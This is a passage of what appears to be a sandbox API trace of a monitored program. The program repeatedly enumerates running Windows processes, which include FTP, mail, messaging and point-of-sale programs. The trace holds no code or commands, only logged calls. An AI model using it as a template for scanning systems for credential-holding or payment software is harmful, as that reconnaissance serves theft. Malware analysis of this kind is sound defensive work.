th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0285.368] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0285.370] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0285.394] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0285.396] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0285.398] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0285.400] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0285.402] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0285.405] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0285.407] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0285.409] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0285.411] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0285.414] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0285.416] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0285.420] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0285.423] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0285.425] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0285.427] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0285.430] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0285.432] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0285.468] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0285.471] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0285.473] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0285.476] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0285.478] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0285.482] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0285.485] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0285.487] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0285.489] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0285.492] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0285.494] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0285.497] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0285.499] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0285.501] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0285.504] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0285.506] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0285.508] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0285.510] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0285.576] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0285.579] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0285.582] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0285.584] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0285.586] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0285.588] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0285.593] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0285.595] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0285.597] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0285.599] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0285.602] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0285.604] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0285.607] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.609] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0285.611] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.613] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0285.615] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0285.617] CloseHandle (hObject=0x2134) returned 1 [0285.617] Sleep (dwMilliseconds=0x64) [0285.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0285.769] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.771] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.773] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.775] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.777] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.783] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.785] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.787] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.788] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.790] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.792] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.895] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.896] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.897] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.899] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.900] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.902] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.907] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.908] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.910] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.911] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0285.913] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0285.914] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.915] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.917] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0285.919] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0285.923] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0285.924] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.926] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 